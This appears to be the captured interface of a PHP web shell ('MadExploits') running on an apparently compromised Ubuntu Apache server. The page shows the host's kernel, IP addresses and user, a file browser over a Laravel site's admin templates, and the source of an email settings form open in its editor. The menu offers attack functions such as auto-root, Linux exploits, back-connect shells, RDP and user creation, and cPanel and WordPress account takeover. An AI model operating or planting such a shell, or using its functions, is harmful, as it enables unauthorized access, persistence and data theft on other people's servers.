Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.143
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
resources /
views /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
advertisements
[ DIR ]
drwxr-xr-x
blogs
[ DIR ]
drwxr-xr-x
category
[ DIR ]
drwxr-xr-x
homepage
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
orders
[ DIR ]
drwxr-xr-x
product_gallery
[ DIR ]
drwxr-xr-x
products
[ DIR ]
drwxr-xr-x
projects
[ DIR ]
drwxr-xr-x
services
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
contact_entries.blade.php
4.63
KB
-rw-r--r--
contactinfo.blade.php
2.43
KB
-rw-r--r--
content_pages.blade.php
6.86
KB
-rw-r--r--
dashboard.blade.php
833
B
-rw-r--r--
email_settings.blade.php
2.83
KB
-rw-r--r--
headerinfo.blade.php
3.32
KB
-rw-r--r--
login.blade.php
4.06
KB
-rw-r--r--
profile.blade.php
2.63
KB
-rw-r--r--
social_media_links.blade.php
3.94
KB
-rw-r--r--
subscribers.blade.php
3.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : email_settings.blade.php
@extends('admin.layouts.app') @section('contents') <div> <ul class="breadcrumb"> <li> <a href="{{ route('admin.headerinfo') }}">Settings </a> </li> <li> <a href="javascript:void();"> Notifications E-mails</a></li> </ul> </div> <div class="row"> <div class="box col-md-12"> <div class="box-inner"> <div class="box-header well" data-original-title=""> <h2><i class="glyphicon glyphicon-edit"></i> Settings</h2> </div> @if(session()->has('error')) <div class="alert alert-danger fade in"> <a href="#" class="close" data-dismiss="alert">×</a> <p>{{ session()->get('error') }}</p> </div> @endif @if(session()->has('success')) <div class="alert alert-success fade in"> <a href="#" class="close" data-dismiss="alert">×</a> <p>{{ session()->get('success') }}</p> </div> @endif <div class="box-content"> <form action="{{ route('admin.update_email_settings',['id'=>$data->id]) }}" method="post" id="update_email_settings"> @csrf <div class="form-group"> <label for="email_password_recovery">Password Recovery E-mail</label> <input type="text" class="form-control required" name="email_password_recovery" id="email_password_recovery" value="{{ $data->email_password_recovery }}" placeholder=""> </div> <div class="form-group"> <label for="email_contact_us">Orders Notifications E-mail</label> <input type="text" class="form-control required" name="email_contact_us" id="email_contact_us" value="{{ $data->email_contact_us }}" placeholder=""> </div> <div class="form-group"> <label for="email_orders">Contact Us Notifications E-mail</label> <input type="text" class="form-control required" name="email_orders" id="email_orders" value="{{ $data->email_orders }}" placeholder=""> </div> <button type="submit" class="btn btn-default">Update</button> </form> </div> </div> </div> <!--/span--> </div> <div style="margin-bottom:70px"> </div> @endsection @push('scripts') <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"></script> <script> $("#update_email_settings").validate(); </script> @endpush
Close